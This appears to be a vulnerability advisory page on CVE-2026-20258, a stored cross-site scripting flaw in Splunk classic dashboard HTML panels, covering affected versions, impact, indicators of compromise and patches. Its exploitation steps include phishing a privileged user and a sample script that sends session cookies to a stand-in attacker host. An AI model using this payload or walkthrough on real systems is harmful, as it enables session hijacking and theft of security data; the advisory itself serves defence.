CVE-2026-20258
Splunk Enterprise vulnerability analysis and mitigation

Overview

CVE-2026-20258 is a stored cross-site scripting (XSS) vulnerability in Splunk Enterprise and Splunk Cloud Platform affecting classic dashboard HTML panels. A low-privileged user without the "admin" or "power" Splunk roles can inject malicious JavaScript into an HTML panel of a classic dashboard, which then executes in the browser of any other user who views that dashboard. Affected Splunk Enterprise versions include those below 10.2.4, 10.0.7, 9.4.12, and 9.3.13; affected Splunk Cloud Platform versions include those below 10.3.2512.11, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132. The vulnerability was disclosed on June 10, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) per NVD, though ENISA rates it 7.1 (High) (Splunk Advisory, GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. Splunk's classic dashboard feature allows users to embed raw HTML in dashboard panels; insufficient sanitization of this input permits a low-privileged attacker to store arbitrary JavaScript that is later rendered in other users' browsers. Exploitation requires a social engineering (phishing) component — the attacker must trick a victim into navigating to or initiating a request that loads the malicious dashboard — meaning the attacker cannot trigger execution at will. No public proof-of-concept code has been identified at this time (Splunk Advisory, GitHub Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of any Splunk user who views the compromised dashboard, potentially enabling session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, and modification of dashboard data. Because Splunk is commonly used as a SIEM and security operations platform, session hijacking could grant attackers access to sensitive log data, security alerts, and operational dashboards. The confidentiality and integrity of data accessible to the victim user are at risk, though availability is not directly impacted (Splunk Advisory, GitHub Advisory).

Exploitation steps

  1. Obtain low-privileged access: Acquire or create a Splunk account that does not hold the "admin" or "power" role on the target Splunk Enterprise or Cloud Platform instance.
  2. Create or edit a classic dashboard: Navigate to the Splunk classic dashboard editor and create a new dashboard or edit an existing one that the attacker has write access to.
  3. Inject malicious JavaScript: Add an HTML panel to the dashboard and embed a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>) in the panel's HTML source.
  4. Save the dashboard: Save the dashboard with the injected payload; the script is now persistently stored in Splunk.
  5. Phish the victim: Craft a convincing message (email, chat, etc.) that tricks a higher-privileged Splunk user into clicking a link that loads the malicious dashboard in their browser.
  6. Harvest session tokens or perform actions: When the victim's browser renders the dashboard, the injected JavaScript executes, exfiltrating session cookies or Splunk tokens to the attacker's server, or performing actions within Splunk on behalf of the victim (Splunk Advisory, GitHub Advisory).

Indicators of compromise

  • Logs: Splunk internal audit logs (_audit index) showing dashboard edits by low-privileged users, particularly modifications to HTML panel content; access logs showing unexpected requests to attacker-controlled external domains originating from Splunk users' browsers.
  • Network: Outbound HTTP/HTTPS requests from Splunk users' browsers to unknown or suspicious external domains shortly after loading a specific dashboard; DNS queries for attacker-controlled domains correlated with Splunk dashboard access events.
  • File System / Configuration: Classic dashboard XML/JSON source files containing <script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded JavaScript (e.g., &#x3C;script&#x3E;) within HTML panel definitions.
  • Behavioral: Unusual Splunk API calls or search activity initiated under a user's session that do not match their normal usage patterns, potentially indicating session token reuse by an attacker.

Mitigation and workarounds

Splunk has released patched versions addressing this vulnerability. For Splunk Enterprise, upgrade to version 10.2.4, 10.0.7, 9.4.12, or 9.3.13 or later. For Splunk Cloud Platform, upgrade to version 10.3.2512.11, 10.2.2510.15, 10.1.2507.23, or 9.3.2411.132 or later. As interim mitigations, administrators should restrict dashboard creation and modification permissions to trusted users only, and audit existing classic dashboards for suspicious HTML panel content containing script tags or JavaScript event handlers (Splunk Advisory).

Community reactions

Security news outlets including CyberSecurityNews and SecurityOnline covered the June 2026 Splunk advisory batch, noting CVE-2026-20258 alongside more critical vulnerabilities such as CVE-2026-20253 (a CVSS 9.8 RCE). The XSS vulnerability received comparatively less attention given its medium severity and exploitation prerequisites. Threat intelligence digests from F5 Labs and Hawk-Eye included it in weekly roundups of notable Splunk vulnerabilities disclosed in June 2026 (F5 Weekly Bulletin, SecurityOnline).

Additional resources


SourceThis report was generated using AI

Related Splunk Enterprise vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-20296HIGH8.3
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesJul 15, 2026
CVE-2026-20297HIGH7.2
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesJul 15, 2026
CVE-2026-20298MEDIUM6.5
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesJul 15, 2026
CVE-2026-20259MEDIUM5.5
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesJun 10, 2026
CVE-2026-20258MEDIUM5.4
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesJun 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management